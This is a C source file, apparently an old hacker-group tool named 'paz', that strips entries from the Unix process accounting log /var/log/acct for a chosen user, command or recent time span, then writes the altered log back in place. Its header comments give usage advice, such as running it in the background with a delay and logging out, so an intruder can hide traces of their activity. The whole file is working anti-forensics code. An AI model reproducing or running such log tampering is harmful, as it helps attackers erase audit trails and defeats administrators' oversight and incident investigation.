/*
 *  PROCESS ACCOUNTING ZAP, Removes entries from (p)acct accounting logs  
 *  by Mindmaniac --- 1996 [THC]
 *
 *  BUGS:	Accounting NEEDS to be stopped before nuking 
 *		(sometimes, just try it)!
 *
 *  Syntax:	paz [-s] {<user>|ALL} [{<command>|ALL} [<seconds-back>] ]
 *
 *  Options:	-s	paz sleeps 20 sec. and then processes (use this
 *			option with & and log out) 
 *		<sec..> if specified, only commands which are <sec..> seconds
 *			back or later in time are affected by deletion
 *
 RELEASE NOTE: PRODUCT UNREVISITED - TO BE RELEASED AS IS - 1998
 */

#define ACCT_LOG "/var/log/acct"     
#define COUNTD 20

#include <stdio.h>
#include <sys/types.h>
#include <sys/file.h>
#include <unistd.h>
#include <time.h>
#include <pwd.h>
#include <strings.h>
#include <signal.h>
#include <fcntl.h>

struct acct
{ char    ac_comm[16];
  time_t  ac_utime, ac_stime, ac_etime, ac_btime;  
  uid_t   ac_uid;
  gid_t   ac_gid; 
  dev_t   ac_tty;    
  char    ac_flag;  
  long    ac_minflt, ac_majflt, ac_exitcode; 
};

main(int argc,char *argv[])
{
 int fd, fd_out, fd_out2;
 struct acct actbuf;
 struct passwd *pwt;
 int uid_to_delete;
 char user[64];
 char command[64] ="";
 long timeback = 0;
 int sleepf=0;
 int entries=0, removed=0;
 long time_now =0;
 char tmp[64] ="", tmp2[64]="";
 
if (argc<2) {
 printf("Usage: %s [-s] {<user>|ALL} [{<command>|ALL} [<seconds-back>] ]\n",argv[0]);  
 exit (1);
}  

/* init params */ 
strcpy(tmp,ACCT_LOG); strcat(tmp,".new"); 
strcpy(tmp2, ACCT_LOG); strcat(tmp2,".new2");
if (!strcmp(argv[1],"-s")) sleepf=1; 
strcpy(user,argv[1+sleepf]);
if ((argc-sleepf)>=3)  strcpy(command,argv[2+sleepf]);
if ((argc-sleepf)>=4)  timeback=atoi(argv[3+sleepf]);

if (!strcmp(command,"")) strcpy(command,"ALL");

printf("SLEEPF=%d USER=%s COMMAND=%s TIMEBACK=%d\n",sleepf,user,command,timeback);
time(&time_now);


 if ( (pwt = getpwnam( argv[1+sleepf]) ) != NULL)
   uid_to_delete = (pwt->pw_uid);
 else if (strcmp(argv[1+sleepf],"ALL")) { 
   printf ("Error: %s is not a valid user\n",argv[1+sleepf]);
   exit(1);
 }  

if (sleepf) {
 setuid(0); 
 sleep(COUNTD);
}

 fd = open(ACCT_LOG,O_RDONLY);
 if (fd < 0) { perror(ACCT_LOG); exit(1); }

 fd_out = creat(tmp,O_RDWR);
 if (fd_out < 0) { perror(tmp); exit(1); }
 
while ( read(fd,(char *)&actbuf,sizeof(actbuf)) ) {
 entries++;
 if( (
    /* wenn kommando nicht uebereinstimmt UND kom-Joker nicht da  */
    ( (strcmp(actbuf.ac_comm,command)) && (strcmp(command,"ALL")))
    ||
    /* wenn UIDs unterschiedlich UND uid-Joker nicht gesetzt  */
    ( (uid_to_delete!=actbuf.ac_uid) && (strcmp(user,"ALL")) ) 
      ) 
  || 
   ( ((time_now-timeback) > actbuf.ac_btime ) && (timeback!=0)) 
   )
 {write(fd_out,(char *)&actbuf,sizeof(actbuf));} 
 else {removed++;}
}
 
close(fd);
close(fd_out);
chmod(tmp,0644);

fd_out = open(tmp, O_RDONLY);
if (fd < 0) { perror(tmp); exit(1); }

fd_out2 = creat(tmp2 ,O_RDWR);
if (fd_out2 < 0) { perror(tmp2); exit(1); }

while ( read(fd_out,(char *)&actbuf,sizeof(actbuf)) ) { 
  write(fd_out2,(char *)&actbuf,sizeof(actbuf));
}  
close(fd_out2);
close(fd_out);
remove(tmp);
remove(ACCT_LOG);
rename(tmp2, ACCT_LOG);
chmod(ACCT_LOG, 0644);
printf("Removed %d / %d entries\n",removed, entries);      

} 
